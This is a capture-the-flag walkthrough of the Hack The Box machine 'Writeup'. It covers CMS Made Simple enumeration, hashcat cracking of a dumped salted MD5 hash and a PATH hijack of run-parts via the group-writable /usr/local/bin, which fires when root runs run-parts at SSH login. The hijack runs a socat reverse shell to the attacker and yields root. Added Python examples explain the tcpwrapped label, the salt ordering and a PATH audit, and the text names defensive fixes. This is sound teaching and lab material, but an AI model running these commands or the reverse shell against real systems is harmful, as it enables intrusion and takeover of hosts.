HTB Writeup

$ nmap -A -T4 -p- -sV

Starting Nmap 7.91 ( ) at 2020-10-16 21:59 CEST
Nmap scan report for
Host is up (0.042s latency).
Not shown: 65533 filtered ports
22/tcp open  ssh        OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 122.74 seconds

Although nmap reports port 80 as open, it also labels it tcpwrapped. What does that mean?

Tcpwrapped refers to tcpwrapper, a host-based network access control program on Unix and Linux.

When Nmap labels something tcpwrapped, it means that the behavior of the port is consistent with one that is protected by tcpwrapper.

Specifically, it means that a full TCP handshake was completed, but the remote host closed the connection without receiving any data.
It is important to note that tcpwrapper protects programs, not ports.

This means that a valid (not false-positive) tcpwrapped response indicates a real network service is available, but you are not on the list of hosts allowed to talk with it.

When a very large number of ports are shown as tcpwrapped, it is unlikely that they represent real services, so the behaviour probably means something else like a load balancer or firewall is intercepting the connection requests.
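To make that distinction concrete, here is an added Python example (not part of the original writeup) that starts a constructed loopback service behaving either like a tcpwrapper-protected daemon or like a reachable service, and classifies each the way nmap's tcpwrapped check does; the loopback host, port and banner string are constructed for the demo.

```python
import socket
import threading

def _fake_service(listener: socket.socket, banner: bytes) -> None:
    """Constructed stand-in for the remote side. With banner=b"" it behaves like a
    daemon behind tcpwrapper whose hosts.allow does not list us: accept the handshake,
    then close without sending a byte. With a banner it behaves like a reachable service."""
    conn, _ = listener.accept()
    with conn:
        if banner:
            conn.sendall(banner)

def classify_port(host: str, port: int, timeout: float = 2.0) -> str:
    """Reproduce the observation behind nmap's 'tcpwrapped' label: the TCP handshake
    completes, then the peer closes before any application data is exchanged."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            data = s.recv(128)
        except socket.timeout:
            return "open, no banner (service waits for client data)"
        except ConnectionResetError:
            return "tcpwrapped-like (reset without data)"
    if data == b"":
        return "tcpwrapped-like (closed without data)"
    return "open, banner: " + data.splitlines()[0].decode(errors="replace")

def probe_constructed_service(banner: bytes) -> str:
    """Start the fake service on a loopback port, probe it once and return the verdict."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    worker = threading.Thread(target=_fake_service, args=(listener, banner))
    worker.start()
    try:
        return classify_port("127.0.0.1", listener.getsockname()[1])
    finally:
        worker.join()
        listener.close()

if __name__ == "__main__":
    print("wrapped :", probe_constructed_service(b""))
    print("real ssh:", probe_constructed_service(b"SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u6\r\n"))
```

A single tcpwrapped verdict like the one on port 80 here is worth keeping in mind as "a service exists but refuses us"; many such verdicts across a scan point to a middlebox instead.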

Access to

Eeyore DoS protection script?

We’ve found this page.

According to this data,

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Cookie: CMSSESSID9d372ef93962=c5esgjkeaerfa215rs0119gat7

There is a Cookie called: CMSSESSID9d372ef93962

We could use wpscan to try to guess which CMS we are targeting, but in this case it is just as easy to check the source code of the web page, which reveals CMS Made Simple:

<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />

On Google: CMS Made simple 2019

$ python3 --url --wordlist

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

According to the script's code, the password it finds is a salted MD5 hash (the salt is prepended to the password, which is hashcat mode 20, md5($salt.$pass)), so hashcat can be used to crack it.

To do that we also need the salt the script reported alongside the hash.

$ echo "62def4866937f08cc13bab43bb14e6f7:5a599ef579066807" > hash
$ hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
* Device #1: pthread-Intel(R) Core(TM) i7-5557U CPU @ 3.10GHz, 4376/4440 MB (2048 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

Session..........: hashcat
Status...........: Cracked
Hash.Name........: md5($salt.$pass)
Hash.Target......: 62def4866937f08cc13bab43bb14e6f7:5a599ef579066807
Time.Started.....: Sat Oct 17 17:22:23 2020 (8 secs)
Time.Estimated...: Sat Oct 17 17:22:31 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   577.3 kH/s (1.29ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4360192/14344385 (30.40%)
Rejected.........: 0/4360192 (0.00%)
Restore.Point....: 4358144/14344385 (30.38%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: raynerleow -> raygan96

Started: Sat Oct 17 17:21:19 2020
Stopped: Sat Oct 17 17:22:32 2020

Password is: raykayjay9

So we have obtained a username and a password.

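As an added example (not the author's script nor hashcat's code), the following Python reproduces what hashcat mode 20 computed for the salt, digest and password above, shows that the other salt ordering (mode 10) would never have matched, and contrasts the cost of one MD5 guess with a slow KDF; the PBKDF2 parameters and the candidate strings in the timing loop are assumed for the demo.

```python
import hashlib
import hmac
import time

# Values from the writeup: the salt and digest dumped from CMS Made Simple and the
# password hashcat recovered with -m 20.
SALT = "5a599ef579066807"
STORED_HASH = "62def4866937f08cc13bab43bb14e6f7"
RECOVERED_PASSWORD = "raykayjay9"

def md5_salt_pass(salt: str, password: str) -> str:
    """hashcat -m 20, md5($salt.$pass): the salt is prepended to the password."""
    return hashlib.md5((salt + password).encode()).hexdigest()

def md5_pass_salt(salt: str, password: str) -> str:
    """hashcat -m 10, md5($pass.$salt): the other order, which does not match CMSMS,
    so picking the wrong mode means a correct wordlist still never cracks the hash."""
    return hashlib.md5((password + salt).encode()).hexdigest()

def verify(salt: str, password: str, stored: str) -> bool:
    """Check a candidate the way the application would, with a constant-time compare."""
    return hmac.compare_digest(md5_salt_pass(salt, password), stored)

def pbkdf2_salt_pass(salt: str, password: str, iterations: int = 100_000) -> str:
    """A slow KDF (PBKDF2-HMAC-SHA256) for comparison: the defensive fix is to store
    passwords with something like this, bcrypt or argon2 instead of a single MD5."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations).hex()

def guesses_per_second(hash_fn, seconds: float = 0.2) -> float:
    """Rough single-thread throughput of a hash function; shows why salting alone
    does not help when each guess costs one MD5."""
    n, deadline = 0, time.perf_counter() + seconds
    while time.perf_counter() < deadline:
        hash_fn(SALT, f"candidate{n}")
        n += 1
    return n / seconds

if __name__ == "__main__":
    print("mode 20 (salt.pass) matches:", verify(SALT, RECOVERED_PASSWORD, STORED_HASH))
    print("mode 10 (pass.salt) matches:", md5_pass_salt(SALT, RECOVERED_PASSWORD) == STORED_HASH)
    print(f"md5 guesses/s    ~ {guesses_per_second(md5_salt_pass):,.0f}")
    print(f"pbkdf2 guesses/s ~ {guesses_per_second(pbkdf2_salt_pass):,.0f}")
```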
$ ssh jkr@

The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:TEw8ogmentaVUz08dLoHLKmD7USL1uIqidsdoX77oy0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
jkr@'s password: 
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

jkr@writeup:~$ ls


jkr@writeup:~$ cat user.txt


Run Linpeas:

jkr@writeup:~$ wget

--2020-10-17 15:56:38--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 293431 (287K) [text/x-sh]
Saving to: ‘’                            100%[=======================================================================>] 286.55K   579KB/s    in 0.5s    

2020-10-17 15:56:39 (579 KB/s) - ‘’ saved [293431/293431]

jkr@writeup:~$ chmod +x
jkr@writeup:~$ ./

Starting linpeas. Caching Writable Folders...

Analyzing the results, we see that user jkr also belongs to the staff group.

[+] All users & groups
uid=0(root) gid=0(root) groups=0(root)                                                                                                                
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)

It is not a group a regular user belongs to by default.

staff: Allows users to add local modifications to the system (/usr/local) without needing root privileges (note that executables in /usr/local/bin are in the PATH variable of any user, and they may «override» the executables in /bin and /usr/bin with the same name). Compare with group «adm», which is more related to monitoring/security.

The files and directories writable by group staff are:

[+] Interesting GROUP writable files (not in Home) (max 500)

Based on the PATH variable, /usr/local/bin comes before /bin.

Now let’s run pspy:

jkr@writeup:~$ wget

--2020-10-17 16:51:47--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                                100%[=======================================================================>]   2.94M  6.53MB/s    in 0.4s    

2020-10-17 16:51:48 (6.53 MB/s) - ‘pspy64’ saved [3078592/3078592]

pspy is a command line tool designed to snoop on processes without needing root permissions. It lets you see commands run by other users, cron jobs, etc. as they execute.

2020/10/17 17:06:01 CMD: UID=0    PID=17592  | /bin/sh -c /root/bin/ >/dev/null 2>&1
2020/10/17 17:06:19 CMD: UID=0    PID=17593  | sshd: jkr [priv]  
2020/10/17 17:06:19 CMD: UID=0    PID=17594  | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/                                                    
2020/10/17 17:06:19 CMD: UID=0    PID=17595  | run-parts --lsbsysinit /etc/update-motd.d 
2020/10/17 17:06:19 CMD: UID=0    PID=17596  | /bin/sh /etc/update-motd.d/10-uname 
2020/10/17 17:06:19 CMD: UID=0    PID=17597  | sshd: jkr [priv]  
2020/10/17 17:06:19 CMD: UID=1000 PID=17598  | sshd: jkr@pts/1   
2020/10/17 17:06:19 CMD: UID=1000 PID=17600  | -bash

When we log in through another ssh connection as user jkr, root's sshd runs the run-parts command by its bare name rather than by an absolute path (with PATH set to /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin, as the pspy line shows).

This matters because it is where the PATH variable comes into play. When an absolute path is used, PATH is not consulted: the system already knows where to find the command.

When only a command name is used, the system walks PATH in order and runs the first executable with that name it finds.

In this case, if we place our own run-parts in /usr/local/bin (writable by group staff and listed before /bin), it will be executed as root the next time an ssh connection is made.

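The two weaknesses described above (a /usr/local/bin that group staff can write to, and root resolving run-parts through PATH rather than by absolute path) combine into one check a defender can run. This is an added Python example, not the author's code; the demo_layout function builds a constructed copy of the box's directory layout in a temporary directory, and the MOTD_PATH value is the one pspy showed.

```python
import os
import stat
import tempfile

# PATH that pspy showed root's sshd handing to run-parts (taken from the writeup above).
MOTD_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

def writable_by_non_owner(directory: str) -> bool:
    """True if the group or everyone can create files here; a member of that group
    (staff for /usr/local/bin on the box) could drop a same-named program into it."""
    mode = os.stat(directory).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_path(path_string: str, commands) -> dict:
    """For each command, find the directory that wins the PATH lookup and list every
    directory searched up to and including it that a non-owner can write to.
    A non-empty list means a bare command name run by root can be shadowed."""
    dirs = [d for d in path_string.split(":") if d]
    findings = {}
    for cmd in commands:
        winner = next((d for d in dirs if os.path.isfile(os.path.join(d, cmd))
                       and os.access(os.path.join(d, cmd), os.X_OK)), None)
        if winner is None:
            continue
        searched = dirs[: dirs.index(winner) + 1]
        risky = [d for d in searched if os.path.isdir(d) and writable_by_non_owner(d)]
        findings[cmd] = {"resolved_in": winner, "shadowable_from": risky}
    return findings

def demo_layout() -> dict:
    """Constructed replica of the box: a group-writable usr/local/bin searched before
    the bin that really holds run-parts. Returns the audit of that PATH."""
    root = tempfile.mkdtemp()
    local_bin = os.path.join(root, "usr", "local", "bin")
    system_bin = os.path.join(root, "bin")
    os.makedirs(local_bin)
    os.makedirs(system_bin)
    os.chmod(local_bin, 0o2775)      # root:staff with group write, as on the box
    os.chmod(system_bin, 0o755)
    target = os.path.join(system_bin, "run-parts")
    with open(target, "w") as f:
        f.write("#!/bin/sh\nexit 0\n")   # stand-in for the real binary
    os.chmod(target, 0o755)
    return audit_path(f"{local_bin}:{system_bin}", ["run-parts"])

if __name__ == "__main__":
    print(demo_layout())
    print(audit_path(MOTD_PATH, ["run-parts"]))   # same check against the live system
```

The fix on the defensive side is either of the two halves: remove group write from /usr/local/bin (or drop users from staff) or have the root-owned job call /bin/run-parts by absolute path.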
Let’s create a known and «nice» run-parts command:

jkr@writeup:/tmp$ nano run-parts

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:

jkr@writeup:/tmp$ chmod +x run-parts
jkr@writeup:/tmp$ cp run-parts /usr/local/bin/
ssh jkr@

jkr@'s password:

socat file:tty,raw,echo=0 TCP-L:4242


root@writeup:/# whoami


root@writeup:/# cat /root/root.txt

